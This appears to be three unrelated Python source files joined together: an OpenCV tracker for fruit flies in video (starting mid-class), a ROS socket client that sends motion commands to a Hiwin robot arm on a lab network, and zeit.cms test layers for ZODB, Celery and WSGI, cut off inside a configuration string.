self.video_frames_num = int(self.video.get(cv2.CAP_PROP_FRAME_COUNT))
self.video_fps = round(self.video.get(cv2.CAP_PROP_FPS))
# gui config
_, temp_frame = self.video.read()
# 热力图累计值。累计的不是坐标值,二十整个二值化区域,累计一帧加一而不是255
self.heatmap = np.zeros(temp_frame.shape[:2], np.int)
# 在这判断训练畸变矫正模型所使用的图像分辨率是否跟当前视频一致,前提是加畸变矫正
if Undistortion_model_path:
map_sp = self.undistort.mapxy.shape[-2:]
frame_sp = temp_frame.shape[:2]
if map_sp != frame_sp:
print('The resolution of training calibration_model images is not same as the resolution of video!')
exit()
# 如果跳过config,那么必须有config.pkl文件
if skip_config:
if not Path(self.output_dir, 'config.pkl').exists():
print("'config.pkl' file is not exists!")
exit()
temp_frame = self.undistort.do(temp_frame)
g = GUI_CFG(temp_frame, [], str(self.output_dir))
res, AB_dist = g.CFG_circle(direct_get_res=skip_config)
if len(res) == 0: raise ValueError
rs = [re[-1] for re in res]
self.dish_radius = int(round(float(np.mean(np.array(rs)))))
self.region_radius = int(round(math.sqrt(area_th) * self.dish_radius))
self.cps = [tuple(re[:2]) for re in res]
# get rois and mask images
self._get_rois()
self._get_maskimgs()
# 计算背景
self.comp_bg()
# 初始化计算果蝇角度的实例
self.flyangle = Fly_angle()
# set begin frame
begin_frame = round(begin_time * 60 * self.video_fps)
self.begin_frame = begin_frame
self.video.set(cv2.CAP_PROP_POS_FRAMES, self.begin_frame)
if duration_time in (None, 'None', 0):
self.duration_frames = self.video_frames_num - self.begin_frame
else:
self.duration_frames = duration_time * 60 * self.video_fps
# 如果用户配置不合理,设置的时间点超出了视频时长,则按照真实视频时长来截取
if self.duration_frames > self.video_frames_num:
self.duration_frames = self.video_frames_num
def _get_rois(self):
r = self.dish_radius
# (h_start, h_end, w_start, w_end)
self.rois = [
(cp[1] - r, cp[1] + r, cp[0] - r, cp[0] + r)
for cp in self.cps
]
def _get_maskimgs(self):
h = int(self.video.get(cv2.CAP_PROP_FRAME_HEIGHT))
w = int(self.video.get(cv2.CAP_PROP_FRAME_WIDTH))
# h, w = 485,863
self.mask_imgs = [
cv2.circle(np.zeros((h, w), np.uint8), cp, self.dish_radius, 255, -1)
for cp in self.cps
]
mask_all = np.zeros((h, w), np.bool)
for img in self.mask_imgs:
mask_all += img.astype(np.bool)
# mask_all = mask_all.astype(np.uint8) * 255
self.mask_all = mask_all
# save
np.save(Path(self.saved_dir, 'mask_imgs.npy'), self.mask_imgs)
# np.save(Path(self.saved_dir, 'cps.npy'), self.cps)
# np.save(Path(self.saved_dir, 'dish_radius.npy'), self.dish_radius)
def comp_bg(self):
# params
frames_num_used = 800
if self.bg_img_path.exists():
bg = cv2.imread(str(self.bg_img_path))
else:
with Wait('Collect frames'):
tim = time.time()
inds = list(range(self.video_frames_num))
random.shuffle(inds)
inds = inds[:frames_num_used]
frames = []
for i in inds:
# print(f'{i}')
self.video.set(cv2.CAP_PROP_POS_FRAMES, i)
ret, frame = self.video.read()
frame = self.undistort.do(frame)
if ret == False:
break
frames.append(frame)
frames = np.array(frames)
# print(frames.shape)
with Wait('Calculate the background image'):
sx = stats.mode(frames)
bg = sx[0][0]
bg = cv2.medianBlur(bg, 3)
cv2.imwrite(str(self.bg_img_path), bg)
print(f'Finished, time consuming:{time.time() - tim}s')
self.video.set(cv2.CAP_PROP_POS_FRAMES, 0)
self.bg = bg
self.gray_bg_int16 = cv2.cvtColor(bg, cv2.COLOR_BGR2GRAY).astype(np.int16)
def play(self, just_save_one_frame=False):
i = 0
pbar = Pbar(total=self.duration_frames)
while True:
ret, frame = self.video.read()
if not ret: break
frame = self.undistort.do(frame)
src = frame.copy()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
foreground_mask = np.abs(frame.astype(np.int16) - self.gray_bg_int16) > self.background_th
# cv2.imshow('foreground_mask', foreground_mask.astype(np.uint8) * 255)
frame = frame < self.seg_th
frame *= self.mask_all
frame = frame.astype(np.uint8) * 255 * foreground_mask
for cp in self.cps:
cv2.circle(frame, cp, self.dish_radius, 255, 1)
cv2.circle(src, cp, self.dish_radius, (0, 0, 255), 1)
# cv2.circle(frame, cp, cfg.Region.radius, 175, 1)
# cv2.circle(src, cp, cfg.Region.radius, 200, 1)
if just_save_one_frame:
cv2.imwrite(str(Path(self.saved_dir, f'{self.video_stem}_1_mask.bmp')), frame)
cv2.imwrite(str(Path(self.saved_dir, f'{self.video_stem}_1_src.bmp')), src)
return
cv2.imshow('mask', frame)
cv2.imshow('src', src)
cv2.waitKey(3)
i += 1
pbar.update(1)
if i >= self.duration_frames:
pbar.close()
break
pbar.close()
def play_and_show_trackingpoints(self, just_save_one_frame=False):
res = np.load(self.res_npy_path)
i = 0
print('showing...')
print('q: exit')
pbar = Pbar(total=self.duration_frames)
while True:
ret, frame = self.video.read()
if not ret:
pbar.close()
break
frame = self.undistort.do(frame)
for cp, tp in zip(self.cps, res[i]):
cv2.circle(frame, cp, self.dish_radius, (255, 0, 0), 1)
# cv2.circle(frame, cp, self.region_radius, (0, 255, 0), 1)
tp = (int(round(tp[0])), int(round(tp[1])))
# cv2.circle(frame, tp, 3, (0, 0, 255), -1)
cv2.line(frame, (tp[0] - 10, tp[1]), (tp[0] + 10, tp[1]), (0, 0, 255), 1)
cv2.line(frame, (tp[0], tp[1] - 10), (tp[0], tp[1] + 10), (0, 0, 255), 1)
if just_save_one_frame:
cv2.imwrite(str(Path(self.saved_dir, f'{self.video_stem}_3_frame.bmp')), frame)
return
cv2.imshow('frame', frame)
k = cv2.waitKey(3) & 0xFF
if chr(k) == 'q' or chr(k) == 'Q':
break
i += 1
pbar.update(1)
if i >= self.duration_frames:
pbar.close()
break
# pbar.close()
def run(self):
self.fly_centroids = []
self.fly_angles = []
pbar = Pbar(total=self.duration_frames)
i = 0
# print(f'begin_frame:{self.begin_frame} duration_frames:{self.duration_frames}')
# self.video.set(cv2.CAP_PROP_POS_FRAMES, 0)
# print(f'all_frames_nub:{self.video.get(cv2.CAP_PROP_FRAME_COUNT)}')
print('tracking...')
while True:
ret, frame = self.video.read()
if not ret:
# print('\nret break\n')
break
frame = self.undistort.do(frame)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
foreground_mask = np.abs(frame.astype(np.int16) - self.gray_bg_int16) > self.background_th
frame = frame < self.seg_th
frame *= self.mask_all
frame = frame.astype(np.uint8) * 255 * foreground_mask
self.heatmap += frame.astype(np.bool).astype(np.int)
oneframe_centroids = []
oneframe_angles = []
for roi in self.rois:
img = frame[roi[0]:roi[1], roi[2]:roi[3]]
retval, labels, stats, centroids = cv2.connectedComponentsWithStats(img)
if retval < 2:
cent = (-1, -1)
ang = self.flyangle.outlier
else:
max_area_id = np.argmax(stats[1:, -1]) + 1
cent = centroids[max_area_id]
cent = (round(cent[0] + roi[2], 2),
round(cent[1] + roi[0], 2))
r = stats[max_area_id]
if r[-1] <= 4: # 面积太小算角度没啥意义,直接返回异常值
ang = self.flyangle.outlier
else:
small_bin_img = img[r[1]:r[1] + r[3], r[0]:r[0] + r[2]]
ang = self.flyangle(small_bin_img)
oneframe_centroids.append(cent)
oneframe_angles.append(ang)
self.fly_centroids.append(oneframe_centroids)
self.fly_angles.append(oneframe_angles)
i += 1
pbar.update()
if i >= self.duration_frames:
# print('\n>= break\n')
break
pbar.close()
self._save()
self.video.set(cv2.CAP_PROP_POS_FRAMES, self.begin_frame)
def _save(self):
# 考虑到发布版本一次运行所保存的单个文件比较大,所以这里不再保存txt仅保存npy文件
with open(self.res_txt_path, 'w') as f:
# 由于计算出来的begin_frame点可能跟上次计算的结果有重复,导致所有结果相加长度不等于总帧数,所以在此保存一下每次结果的起始点
f.write(f'{self.begin_frame}\n')
for line in self.fly_centroids:
f.write(f'{line}\n')
np.save(self.res_npy_path, np.array(self.fly_centroids, dtype=np.float64))
np.save(self.fly_angles_path, np.array(self.fly_angles, dtype=np.float64))
np.save(self.heatmap_path, self.heatmap)
'''
潜在坑:
已被证实:【opencv直接获取的总帧数跟逐帧读实际获取的不一致】
而且多进程处理时,set到指定的时间点分片段读可能会有问题。
set到不同时间点读取的总帧数最后相加等于opencv直接获取的,直接逐帧读是不一致的,这就比较奇怪。
github上也有人提出类似问题:
https://github.com/opencv/opencv/issues/9053
'''
# def pbarFilenubs(dir, total, fmt='*.npy'):
# pbar = Pbar(total=total)
# d = Path(dir)
# while True:
# if d.exists():
# filenub = len(list(d.rglob(fmt)))
# else:
# filenub = 0
# pbar.update(set=True, set_value=filenub)
# time.sleep(0.2)
#
#
# def fn(params):
# s = FlySeg(**params)
# s.run()
#
#
# def multiprocessing(seg_params, cpus=45):
# cap = cv2.VideoCapture(seg_params['video_path'])
# frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
# fps = round(cap.get(cv2.CAP_PROP_FPS))
# time = frames / fps / 60
#
# params = []
# for t in range(0, round(time), seg_params['duration_time']):
# params.append({**seg_params, 'begin_time': t, 'save_txt_name': f'{t:0>4d}.txt'})
# FlySeg(**params[0]) # 先初始化一下,计算一下背景图和中心点,后面多进程的时候就不用每个都计算了
#
# print(f'total length: {len(params)}')
# kwargs = {
# 'dir': Path(Path(seg_params['video_path']).parent, Path(seg_params['video_path']).stem),
# 'total': len(params),
# 'fmt': '*.npy'
# }
# thr = Thread(target=pbarFilenubs, kwargs=kwargs)
# thr.start()
# pool = Pool(cpus)
# pool.map(fn, params)
# stop_thread(thr)
# print('done')
#
#
# def run(cf, mode, just_save_one_frame=True):
# args = ['video_path', 'h_num', 'w_num', 'duration_time', 'seg_th', 'background_th',
# 'area_th', 'minR_maxR_minD', 'dish_exclude', 'Undistortion_model_path']
# seg_params = {arg: cf[arg] for arg in args}
# seg_params_play = {
# **seg_params,
# 'save_txt_name': '0.txt',
# 'begin_time': 150,
# }
# if mode == 1:
# s = FlySeg(**seg_params_play)
# s.play(just_save_one_frame=just_save_one_frame)
# # s.run()
# elif mode == 2:
# t1 = time.time()
# multiprocessing(seg_params, cpus=cf['cpus'])
# print(f'time_used: {(time.time() - t1) / 60} minutes')
# elif mode == 3:
# s = FlySeg(**seg_params_play)
# s.play_and_show_trackingpoints(just_save_one_frame=just_save_one_frame)
if __name__ == '__main__':
# f = FlySeg(
# video_path=r'D:\Pycharm_Projects\qu_holmes_su_release\tests\demo.mp4',
# save_txt_name='0000.txt',
# begin_time=0,
# duration_time=1,
# # config_it=False,
# )
# f.run()
# f.play_and_show_trackingpoints()
cap = cv2.VideoCapture(r'Z:\dataset\qususu\0923\easyflytracker_test\202009231045.avi')
print(cap.get(cv2.CAP_PROP_FRAME_COUNT))
i = 0
while True:
ret, frame = cap.read()
if not ret: break
i += 1
print(i)
|
Hiwin_RT605_ArmCommand_Socket_20190627185509.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
#Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = speedmode
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global Socket,arm_mode_flag,data
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 6 ##切換初始mode狀態
print(data)
print("Socket:", Socket)
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
print(Socket.recv(1024))
Socket_feedback(s)
# while 1:
# feedback_str = Socket.recv(1024)
# #手臂端傳送手臂狀態
# if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
# state_feedback.ArmState = 0
# if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
# state_feedback.ArmState = 1
# if str(feedback_str[2]) == '54':# 6 策略完成
# state_feedback.ArmState = 6
# print("shutdown")
# #確認傳送旗標
# if str(feedback_str[4]) == '48':#回傳0 false
# state_feedback.SentFlag = 0
# if str(feedback_str[4]) == '49':#回傳1 true
# state_feedback.SentFlag = 1
# ##---------------socket 傳輸手臂命令 end-----------------
# if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
# break
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6##切換初始mode狀態
## 多執行緒
t = threading.Thread(target=socket_client)
t.start() # 開啟多執行緒
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## 多執行序 end
|
testing.py
|
from six import StringIO
from six.moves.urllib.parse import urljoin
from unittest import mock
import ZODB
import ZODB.DemoStorage
import base64
import celery.contrib.testing.app
import celery.contrib.testing.worker
import celery_longterm_scheduler
import contextlib
import copy
import datetime
import doctest
import gocept.httpserverlayer.custom
import gocept.jslint
import gocept.selenium
import gocept.testing.assertion
import inspect
import json
import kombu
import logging
import lxml.etree
import lxml.html
import os
import pkg_resources
import plone.testing
import plone.testing.zca
import plone.testing.zodb
import pyramid_dogpile_cache2
import pytest
import re
import selenium.webdriver
import six
import sys
import tempfile
import threading
import transaction
import unittest
import waitress.server
import webtest.lint
import xml.sax.saxutils
import zeit.cms.application
import zeit.cms.celery
import zeit.cms.workflow.mock
import zeit.cms.wsgi
import zeit.cms.zope
import zeit.connector.interfaces
import zeit.connector.mock
import zope.app.appsetup.product
import zope.app.publication.zopepublication
import zope.app.wsgi
import zope.component
import zope.component.hooks
import zope.error.interfaces
import zope.i18n.interfaces
import zope.publisher.browser
import zope.security.management
import zope.security.proxy
import zope.security.testing
import zope.testbrowser.browser
import zope.testing.renormalizing
class LoggingLayer(plone.testing.Layer):
def setUp(self):
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('zeit').setLevel(logging.DEBUG)
logging.getLogger('zeit.cms.repository').setLevel(logging.INFO)
logging.getLogger('selenium').setLevel(logging.INFO)
logging.getLogger('bugsnag').setLevel(logging.FATAL)
logging.getLogger('waitress').setLevel(logging.ERROR)
LOGGING_LAYER = LoggingLayer()
class CeleryEagerLayer(plone.testing.Layer):
def setUp(self):
zeit.cms.celery.CELERY.conf.task_always_eager = True
def tearDown(self):
zeit.cms.celery.CELERY.conf.task_always_eager = False
CELERY_EAGER_LAYER = CeleryEagerLayer()
class ProductConfigLayer(plone.testing.Layer):
DELETE = object()
def __init__(self, config, package=None, patches=None,
name='ConfigLayer', module=None, bases=None):
if module is None:
module = inspect.stack()[1][0].f_globals['__name__']
super(ProductConfigLayer, self).__init__(
name=name, module=module, bases=bases)
if not package:
package = '.'.join(module.split('.')[:-1])
self.package = package
if isinstance(config, six.string_types): # BBB
config = self.loadConfiguration(config, package)
self.config = config
self.patches = patches or {}
def loadConfiguration(self, text, package):
return zope.app.appsetup.product.loadConfiguration(
StringIO(text))[package]
def setUp(self):
zope.app.appsetup.product.setProductConfiguration(
self.package, copy.deepcopy(self.config))
self.previous = {}
for package, config in self.patches.items():
previous = self.previous[package] = {}
product = zope.app.appsetup.product.getProductConfiguration(
package)
for key in config:
if product and key in product:
previous[key] = copy.deepcopy(product[key])
else:
previous[key] = self.DELETE
self._update(package, config)
def tearDown(self):
zope.app.appsetup.product.setProductConfiguration(self.package, None)
for package, config in self.previous.items():
self._update(package, config)
def testSetUp(self):
zope.app.appsetup.product.setProductConfiguration(
self.package, copy.deepcopy(self.config))
for package, config in self.patches.items():
self._update(package, config)
def _update(self, package, config):
product = zope.app.appsetup.product.getProductConfiguration(package)
if product is None:
zope.app.appsetup.product.setProductConfiguration(package, {})
product = zope.app.appsetup.product.getProductConfiguration(
package)
for key, value in config.items():
if value is self.DELETE:
product.pop(key, None)
else:
product[key] = copy.deepcopy(value)
class ZCMLLayer(plone.testing.Layer):
defaultBases = (LOGGING_LAYER,)
def __init__(self, config_file='ftesting.zcml',
name='ZCMLLayer', module=None, bases=()):
if module is None:
module = inspect.stack()[1][0].f_globals['__name__']
if not config_file.startswith('/'):
config_file = pkg_resources.resource_filename(module, config_file)
self.config_file = config_file
super(ZCMLLayer, self).__init__(
name=name, module=module, bases=self.defaultBases + bases)
def setUp(self):
# We'd be fine with calling zope.configuration directly here, but we
# need to make zope.app.appsetup.getConfigContext() work, which we
# cannot do from the outside due to name mangling, sigh.
#
# context = zope.configuration.config.ConfigurationMachine()
# zope.configuration.xmlconfig.registerCommonDirectives(context)
# zope.configuration.xmlconfig.file(self.config_file, context=context)
# context.execute_actions()
self['zcaRegistry'] = plone.testing.zca.pushGlobalRegistry()
self.assert_non_browser_modules_have_no_browser_zcml()
zeit.cms.zope._load_zcml(self.config_file)
def assert_non_browser_modules_have_no_browser_zcml(self):
# Caveat emptor: This whole method is a bunch of heuristics, but
# hopefully they are useful.
for browser in ['browser', 'json', 'xmlrpc']:
if '.' + browser in self.__module__:
return
if self.__module__.startswith('zeit.addcentral'):
# XXX This is a historical edge case.
return
configure_zcml = os.path.dirname(self.config_file) + '/configure.zcml'
if not os.path.exists(configure_zcml):
return # be defensive
zcml = open(configure_zcml).read().splitlines()
for directive in ['namespaces.zope.org/browser', 'gocept:pagelet']:
for i, line in enumerate(zcml):
if directive in line:
raise AssertionError(
'Browser-specific directive found in %s\n'
' %s: %s' % (configure_zcml, i, line))
def tearDown(self):
plone.testing.zca.popGlobalRegistry()
del self['zcaRegistry']
# We also need to clean up various other Zope registries here
# (permissions, tales expressions etc.), but the zope.testing mechanism
# to do that unfortunately also includes clearing the product config,
# which we do NOT want.
product = zope.app.appsetup.product.saveConfiguration()
zope.testing.cleanup.cleanUp()
zope.app.appsetup.product.restoreConfiguration(product)
def testSetUp(self):
self['zcaRegistry'] = plone.testing.zca.pushGlobalRegistry()
def testTearDown(self):
self['zcaRegistry'] = plone.testing.zca.popGlobalRegistry()
class ZODBLayer(plone.testing.Layer):
def setUp(self):
self['zodbDB-layer'] = ZODB.DB(ZODB.DemoStorage.DemoStorage(
name=self.__name__ + '-layer'))
def tearDown(self):
self['zodbDB-layer'].close()
del self['zodbDB-layer']
def testSetUp(self):
self['zodbDB'] = plone.testing.zodb.stackDemoStorage(
self['zodbDB-layer'], name=self.__name__)
self['zodbConnection'] = self['zodbDB'].open()
def testTearDown(self):
transaction.abort()
self['zodbConnection'].close()
del self['zodbConnection']
self['zodbDB'].close()
del self['zodbDB']
class MockConnectorLayer(plone.testing.Layer):
def testTearDown(self):
connector = zope.component.queryUtility(
zeit.connector.interfaces.IConnector)
if isinstance(connector, zeit.connector.mock.Connector):
connector._reset()
MOCK_CONNECTOR_LAYER = MockConnectorLayer()
class MockWorkflowLayer(plone.testing.Layer):
def testTearDown(self):
zeit.cms.workflow.mock.reset()
MOCK_WORKFLOW_LAYER = MockWorkflowLayer()
class CacheLayer(plone.testing.Layer):
def testTearDown(self):
pyramid_dogpile_cache2.clear()
DOGPILE_CACHE_LAYER = CacheLayer()
class ZopeLayer(plone.testing.Layer):
defaultBases = (
CELERY_EAGER_LAYER,
DOGPILE_CACHE_LAYER,
MOCK_CONNECTOR_LAYER,
MOCK_WORKFLOW_LAYER,
)
def __init__(self, name='ZopeLayer', module=None, bases=()):
if module is None:
module = inspect.stack()[1][0].f_globals['__name__']
super(ZopeLayer, self).__init__(
name=name, module=module,
# This is a bit kludgy. We need an individual ZODB layer per ZCML
# file (so e.g. different install generations are isolated), but
# we don't really want to have to create one per package.
bases=self.defaultBases + bases + (ZODBLayer(),))
def setUp(self):
zope.event.notify(zope.processlifetime.DatabaseOpened(
self['zodbDB-layer']))
transaction.commit()
with self.rootFolder(self['zodbDB-layer']):
pass
self['rootFolder'] = self.rootFolder
def tearDown(self):
del self['rootFolder']
@contextlib.contextmanager
def rootFolder(self, db):
"""Helper for other layers to access the ZODB.
We cannot leave a connection open after setUp, since it will join the
transactions that happen during the tests, which breaks because the
same DB is then joined twice. Thus we have to take care and close it
each time.
"""
connection = db.open()
root = connection.root()[
zope.app.publication.zopepublication.ZopePublication.root_name]
self._set_current_zca(root)
yield root
transaction.commit()
connection.close()
def testSetUp(self):
self['zodbApp'] = self['zodbConnection'].root()[
zope.app.publication.zopepublication.ZopePublication.root_name]
self._set_current_zca(self['zodbApp'])
transaction.commit()
def testTearDown(self):
zope.component.hooks.setSite(None)
zope.security.management.endInteraction()
del self['zodbApp']
def _set_current_zca(self, root):
site = zope.component.getSiteManager(root)
site.__bases__ = (self['zcaRegistry'],)
class WSGILayer(plone.testing.Layer):
def __init__(self, name='WSGILayer', module=None, bases=None):
if module is None:
module = inspect.stack()[1][0].f_globals['__name__']
super(WSGILayer, self).__init__(
name=name, module=module, bases=bases)
def setUp(self):
self['zope_app'] = zope.app.wsgi.WSGIPublisherApplication(
self['zodbDB-layer'])
self['wsgi_app'] = zeit.cms.wsgi.wsgi_pipeline(
self['zope_app'], [('fanstatic', 'egg:fanstatic#fanstatic')],
{'fanstatic.' + key: value for key, value
in zeit.cms.application.FANSTATIC_SETTINGS.items()})
def testSetUp(self):
# Switch database to the currently active DemoStorage.
# Adapted from gocept.httpserverlayer.zopeapptesting.TestCase
application = self['zope_app']
factory = type(application.requestFactory)
application.requestFactory = factory(self['zodbDB'])
def tearDown(self):
del self['wsgi_app']
del self['zope_app']
class CeleryWorkerLayer(plone.testing.Layer):
"""Sets up a thread-layerd celery worker.
Modeled after celery.contrib.testing.pytest.celery_session_worker and
celery_session_app.
"""
queues = (
'default', 'publish_homepage', 'publish_highprio', 'publish_lowprio',
'publish_default', 'publish_timebased', 'webhook')
default_queue = 'default'
def __init__(self, name='CeleryLayer', module=None, bases=None):
if module is None:
module = inspect.stack()[1][0].f_globals['__name__']
super(CeleryWorkerLayer, self).__init__(
name=name, module=module, bases=bases)
def setUp(self):
self['celery_app'] = zeit.cms.celery.CELERY
self['celery_previous_config'] = dict(self['celery_app'].conf)
self['celery_app'].conf.update(
celery.contrib.testing.app.DEFAULT_TEST_CONFIG)
self['celery_app'].conf.update({
'task_always_eager': False,
'task_create_missing_queues': False,
'task_default_queue': self.default_queue,
'task_queues': [kombu.Queue(q) for q in self.queues],
'task_send_sent_event': True, # So we can inspect routing in tests
'longterm_scheduler_backend': 'memory://',
'TESTING': True,
'ZODB': self['zodbDB-layer'],
})
self.reset_celery_app()
self['celery_worker'] = celery.contrib.testing.worker.start_worker(
self['celery_app'])
self['celery_worker'].__enter__()
def reset_celery_app(self):
# Reset cached_property values that depend on app.conf values, after
# config has been changed.
cls = type(self['celery_app'])
for name in dir(cls):
prop = getattr(cls, name)
if isinstance(prop, kombu.utils.objects.cached_property):
self['celery_app'].__dict__.pop(name, None)
def testSetUp(self):
# Switch database to the currently active DemoStorage,
# see zeit.cms.testing.WSGILayer.testSetUp().
self['celery_app'].conf['ZODB'] = self['zodbDB']
celery_longterm_scheduler.get_scheduler(
self['celery_app']).backend.__init__(None, None)
def tearDown(self):
self['celery_worker'].__exit__(None, None, None)
del self['celery_worker']
# This should remove any config additions made by us.
self['celery_app'].conf.clear()
self['celery_app'].conf.update(self['celery_previous_config'])
del self['celery_previous_config']
self.reset_celery_app()
del self['celery_app']
# celery.contrib.testing.worker expects a 'ping' task, so it can check that the
# worker is running properly.
@zeit.cms.celery.task(name='celery.ping')
def celery_ping():
return 'pong'
class RecordingRequestHandler(gocept.httpserverlayer.custom.RequestHandler):
response_code = 200
response_headers = {}
response_body = '{}'
def do_GET(self):
length = int(self.headers.get('content-length', 0))
self.requests.append(dict(
verb=self.command,
path=self.path,
headers=self.headers,
body=self.rfile.read(length).decode('utf-8') if length else None,
))
self.send_response(self._next('response_code'))
for key, value in self._next('response_headers').items():
self.send_header(key, value)
self.end_headers()
self.wfile.write(six.ensure_binary(self._next('response_body')))
def _next(self, name):
result = getattr(self, name)
if isinstance(result, list):
result = result.pop(0)
return result
do_POST = do_GET
do_PUT = do_GET
do_DELETE = do_GET
class HTTPLayer(gocept.httpserverlayer.custom.Layer):
def testSetUp(self):
super(HTTPLayer, self).testSetUp()
self['request_handler'].requests = []
self['request_handler'].response_headers = {}
self['request_handler'].response_body = '{}'
self['request_handler'].response_code = 200
cms_product_config = """\
<product-config zeit.cms>
environment testing
source-access file://{base}/content/access.xml
source-serie file://{base}/content/serie.xml
